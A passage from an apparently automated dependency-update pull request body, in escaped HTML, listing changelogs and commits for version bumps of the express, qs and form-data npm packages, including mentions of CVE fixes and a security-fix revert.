href=\"https://github.com/expressjs/express/compare/4.21.0...4.21.1\"\u003ehttps://github.com/expressjs/express/compare/4.21.0...4.21.1\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/express/blob/v4.22.1/History.md\"\u003eexpress's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e4.22.1 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eRevert security fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.22.0 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for dependencies\u003c/li\u003e\n\u003cli\u003edeps: qs@6.14.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.2 / 2024-11-06\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.12\n\u003cul\u003e\n\u003cli\u003eFix backtracking protection\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.11\n\u003cul\u003e\n\u003cli\u003eThrows an error on invalid path values\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.1 / 2024-10-08\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eBackported a fix for \u003ca href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-47764\"\u003eCVE-2024-47764\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.0 / 2024-09-11\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate \u003ccode\u003eres.location(\u0026quot;back\u0026quot;)\u003c/code\u003e and \u003ccode\u003eres.redirect(\u0026quot;back\u0026quot;)\u003c/code\u003e magic string\u003c/li\u003e\n\u003cli\u003edeps: serve-static@1.16.2\n\u003cul\u003e\n\u003cli\u003eincludes send@0.19.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: finalhandler@1.3.1\u003c/li\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.20.0 / 2024-09-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: serve-static@0.16.0\n\u003cul\u003e\n\u003cli\u003eRemove link renderization in html while redirecting\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: send@0.19.0\n\u003cul\u003e\n\u003cli\u003eRemove link renderization in html while redirecting\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: body-parser@0.6.0\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003edepth\u003c/code\u003e option to customize the depth level in the parser\u003c/li\u003e\n\u003cli\u003eIMPORTANT: The default \u003ccode\u003edepth\u003c/code\u003e level for parsing URL-encoded data is now \u003ccode\u003e32\u003c/code\u003e (previously was \u003ccode\u003eInfinity\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eRemove link renderization in html while using \u003ccode\u003eres.redirect\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.10\n\u003cul\u003e\n\u003cli\u003eAdds support for named matching groups in the routes using a regex\u003c/li\u003e\n\u003cli\u003eAdds backtracking protection to parameters without regexes defined\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: encodeurl@~2.0.0\n\u003cul\u003e\n\u003cli\u003eRemoves encoding of \u003ccode\u003e\\\u003c/code\u003e, \u003ccode\u003e|\u003c/code\u003e, and \u003ccode\u003e^\u003c/code\u003e to align better with URL spec\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eDeprecate passing \u003ccode\u003eoptions.maxAge\u003c/code\u003e and \u003ccode\u003eoptions.expires\u003c/code\u003e to \u003ccode\u003eres.clearCookie\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/12fae14531a78f19a2caaa5d4f58d9b01eaf3194\"\u003e\u003ccode\u003e12fae14\u003c/code\u003e\u003c/a\u003e 4.22.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/5ddf311af32e772a77fd48b6266ce2f1ba330e1a\"\u003e\u003ccode\u003e5ddf311\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;sec: security patch for CVE-2024-51999\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/49744abd1120484fe64d7bde1cd3197c32523b6e\"\u003e\u003ccode\u003e49744ab\u003c/code\u003e\u003c/a\u003e 4.22.0 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6921\"\u003e#6921\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/6e97452f600a3b01719fbc5517d833c7646b0bb7\"\u003e\u003ccode\u003e6e97452\u003c/code\u003e\u003c/a\u003e sec: security patch for CVE-2024-51999\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/6a23d34d652b9e69a4486d2a2a0dea54b9685fa5\"\u003e\u003ccode\u003e6a23d34\u003c/code\u003e\u003c/a\u003e deps: use tilde notation for \u003ccode\u003eqs\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6919\"\u003e#6919\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/8c12cdf93b89a4628b59179e3cc0722fc517d6b3\"\u003e\u003ccode\u003e8c12cdf\u003c/code\u003e\u003c/a\u003e deps: qs@6.14.0 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6909\"\u003e#6909\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/7fea74fcf02764580f38f2a7f1932dfa54cddd90\"\u003e\u003ccode\u003e7fea74f\u003c/code\u003e\u003c/a\u003e deps: use tilde notation for certain dependencies (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6905\"\u003e#6905\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/dac7a0475a99e9dfc57b3b8e6d5bdf52813f1944\"\u003e\u003ccode\u003edac7a04\u003c/code\u003e\u003c/a\u003e chore: wider range for query test skip (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6513\"\u003e#6513\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/997919b48879bbd53171c3b4e5dd1b04ad139241\"\u003e\u003ccode\u003e997919b\u003c/code\u003e\u003c/a\u003e ci: add node.js 24 to test matrix (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6506\"\u003e#6506\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/36fb59c6c7d9dfca0b08dfeafb5b6e4a249234a1\"\u003e\u003ccode\u003e36fb59c\u003c/code\u003e\u003c/a\u003e fix(ci): reorder \u003ccode\u003enpm i\u003c/code\u003e steps to fix ci for older node versions (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6336\"\u003e#6336\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/expressjs/express/compare/4.18.2...v4.22.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~jonchurch\"\u003ejonchurch\u003c/a\u003e, a new releaser for express since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.11.1 to 6.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: mark overflow objects for indexed notation exceeding \u003ccode\u003earrayLimit\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/546\"\u003e#546\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003earrayLimit\u003c/code\u003e means max count, not max index, in \u003ccode\u003ecombine\u003c/code\u003e/\u003ccode\u003emerge\u003c/code\u003e/\u003ccode\u003eparseArrayValue\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: throw on \u003ccode\u003earrayLimit\u003c/code\u003e exceeded with indexed notation when \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e is true (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: enforce \u003ccode\u003earrayLimit\u003c/code\u003e on \u003ccode\u003ecomma\u003c/code\u003e-parsed values\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: fix error message to reflect arrayLimit as max index; remove extraneous comments (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/545\"\u003e#545\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[meta] fix changelog typo (\u003ccode\u003earrayLength\u003c/code\u003e → \u003ccode\u003earrayLimit\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] ensure \u003ccode\u003earrayLimit\u003c/code\u003e applies to \u003ccode\u003e[]\u003c/code\u003e notation as well\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: when a custom decoder returns \u003ccode\u003enull\u003c/code\u003e for a key, ignore that key\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: extract key segment splitting helper\u003c/li\u003e\n\u003cli\u003e[meta] add threat model\u003c/li\u003e\n\u003cli\u003e[actions] add workflow permissions\u003c/li\u003e\n\u003cli\u003e[Tests] \u003ccode\u003estringify\u003c/code\u003e: increase coverage\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e, \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003enpmignore\u003c/code\u003e, \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003efor-each\u003c/code\u003e, \u003ccode\u003eobject-inspect\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003ethrowOnParameterLimitExceeded\u003c/code\u003e option (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/517\"\u003e#517\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: use \u003ccode\u003eutils.combine\u003c/code\u003e more\u003c/li\u003e\n\u003cli\u003e[patch] \u003ccode\u003eparse\u003c/code\u003e: add explicit \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e default\u003c/li\u003e\n\u003cli\u003e[actions] use shared action; re-add finishers\u003c/li\u003e\n\u003cli\u003e[meta] Fix changelog formatting bug\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003eside-channel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003ehas-bigints\u003c/code\u003e, \u003ccode\u003ehas-proto\u003c/code\u003e, \u003ccode\u003ehas-symbols\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.3\u003c/strong\u003e\u003c/h2\u003e\n\u003cp\u003e[Fix] fix regressions from robustness refactor\n[actions] update reusable workflows\u003c/p\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: avoid a crash when a \u003ccode\u003efilter\u003c/code\u003e key is \u003ccode\u003enull\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eutils.merge\u003c/code\u003e: functions should not be stringified into keys\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: avoid a crash with interpretNumericEntities: true, comma: true, and iso charset\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: ensure a non-string \u003ccode\u003efilter\u003c/code\u003e does not crash\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003e__proto__\u003c/code\u003e syntax instead of \u003ccode\u003eObject.create\u003c/code\u003e for null objects\u003c/li\u003e\n\u003cli\u003e[Refactor] misc cleanup\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/bdcf0c7f82387c18ac8fabfccd2f440645cef47b\"\u003e\u003ccode\u003ebdcf0c7\u003c/code\u003e\u003c/a\u003e v6.14.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/294db90c812ddbe7d7a35d5687c505fd21a2d6a2\"\u003e\u003ccode\u003e294db90\u003c/code\u003e\u003c/a\u003e [readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5c308e5516c270a78caa6f278465914090f91ec6\"\u003e\u003ccode\u003e5c308e5\u003c/code\u003e\u003c/a\u003e [readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/6addf8cf738d529c54d91f6f3ffb6c1be91bbfdc\"\u003e\u003ccode\u003e6addf8c\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: mark overflow objects for indexed notation exceeding \u003ccode\u003earrayLimit\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/cfc108f662326d6ab540f3545ef0b832baf83cdf\"\u003e\u003ccode\u003ecfc108f\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003earrayLimit\u003c/code\u003e means max count, not max index, in \u003ccode\u003ecombine\u003c/code\u003e/\u003ccode\u003emerge\u003c/code\u003e/`pars...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/febb64442a80e49200211fa38d3c96b58024ac77\"\u003e\u003ccode\u003efebb644\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: throw on \u003ccode\u003earrayLimit\u003c/code\u003e exceeded with indexed notation when `thr...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/f6a7abff1f13d644db9b05fe4f2c98ada6bf8482\"\u003e\u003ccode\u003ef6a7abf\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: enforce \u003ccode\u003earrayLimit\u003c/code\u003e on \u003ccode\u003ecomma\u003c/code\u003e-parsed values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/fbc5206c25b4d1851cea683f02c10756c521d15a\"\u003e\u003ccode\u003efbc5206\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: fix error message to reflect arrayLimit as max index; remove e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/1b9a8b4e78c6aff4c22fa559107227f02fd0216a\"\u003e\u003ccode\u003e1b9a8b4\u003c/code\u003e\u003c/a\u003e [actions] fix rebase workflow permissions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/2a35775614e0fb46ac8a3060201a32a7c23a7fda\"\u003e\u003ccode\u003e2a35775\u003c/code\u003e\u003c/a\u003e [meta] fix changelog typo (\u003ccode\u003earrayLength\u003c/code\u003e → \u003ccode\u003earrayLimit\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.11.1...v6.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `form-data` from 4.0.0 to 4.0.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/releases\"\u003eform-data's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.3...v4.0.4\"\u003ev4.0.4\u003c/a\u003e - 2025-07-16\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/811f68282fab0315209d0e2d1c44b6c32ea0d479\"\u003e\u003ccode\u003e811f682\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/1d11a76434d101f22fdb26b8aef8615f28b98402\"\u003e\u003ccode\u003e1d11a76\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0\"\u003e\u003ccode\u003e3d17230\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] fix linting errors \u003ca href=\"https://github.com/form-data/form-data/commit/5e340800b5f8914213e4e0378c084aae71cfd73a\"\u003e\u003ccode\u003e5e34080\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/316c82ba93fd4985af757b771b9a1f26d3b709ef\"\u003e\u003ccode\u003e316c82b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/58c25d76406a5b0dfdf54045cf252563f2bbda8d\"\u003e\u003ccode\u003e58c25d7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2300ca19595b0ee96431e868fe2a40db79e41c61\"\u003e\u003ccode\u003e2300ca1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.2...v4.0.3\"\u003ev4.0.3\u003c/a\u003e - 2025-06-05\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] use a shared config \u003ca href=\"https://github.com/form-data/form-data/commit/426ba9ac440f95d1998dac9a5cd8d738043b048f\"\u003e\u003ccode\u003e426ba9a\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix some spacing issues \u003ca href=\"https://github.com/form-data/form-data/commit/20941917f0e9487e68c564ebc3157e23609e2939\"\u003e\u003ccode\u003e2094191\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/81ab41b46fdf34f5d89d7ff30b513b0925febfaa\"\u003e\u003ccode\u003e81ab41b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/8d8e4693093519f7f18e3c597d1e8df8c493de9e\"\u003e\u003ccode\u003e8d8e469\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add tests to check the behavior of \u003ccode\u003egetBoundary\u003c/code\u003e with non-strings \u003ca href=\"https://github.com/form-data/form-data/commit/837b8a1f7562bfb8bda74f3fc538adb7a5858995\"\u003e\u003ccode\u003e837b8a1\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/870e4e665935e701bf983a051244ab928e62d58e\"\u003e\u003ccode\u003e870e4e6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/e6e83ccb545a5619ed6cd04f31d5c2f655eb633e\"\u003e\u003ccode\u003ee6e83cc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/4066fd6f65992b62fa324a6474a9292a4f88c916\"\u003e\u003ccode\u003e4066fd6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/c4bbb13c0ef669916657bc129341301b1d331d75\"\u003e\u003ccode\u003ec4bbb13\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v4.0.1...v4.0.2\"\u003ev4.0.2\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix (npmignore): ignore temporary build files \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/532\"\u003e\u003ccode\u003e[#532](https://github.com/form-data/form-data/issues/532)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/blob/master/CHANGELOG.md\"\u003eform-data's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca 